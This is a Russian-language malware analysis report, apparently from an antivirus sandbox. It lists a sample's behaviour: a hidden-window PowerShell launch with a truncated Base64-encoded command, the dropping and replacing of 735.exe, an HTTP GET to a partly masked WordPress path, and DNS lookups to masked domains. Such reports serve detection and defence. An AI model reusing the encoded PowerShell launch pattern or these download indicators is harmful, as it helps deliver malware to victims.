Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAGEAaQBqAGIAcABwAGwAbABkAD0AJwBSAGIAagBrAHMAegBmAGcAbQBhAGEAbQBkACcAOwAkAFgAeABtAGsAZQBqAHAAagAgAD...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\735.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Удаляет следующие файлы
- %HOMEPATH%\735.exe
Подменяет следующие файлы
- %HOMEPATH%\735.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://xn#####c1bdfb.com.ua/wp-includes/iKdeWcRji/
UDP
- DNS ASK sp###edesign.eu
- DNS ASK xn#####c1bdfb.com.ua
- DNS ASK re##pt.site
- DNS ASK ca##erbd.tk
- DNS ASK to###artires.ca
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAGEAaQBqAGIAcABwAGwAbABkAD0AJwBSAGIAagBrAHMAegBmAGcAbQBhAGEAbQBkACcAOwAkAFgAeABtAGsAZQBqAHAAagAgAD...' (со скрытым окном)
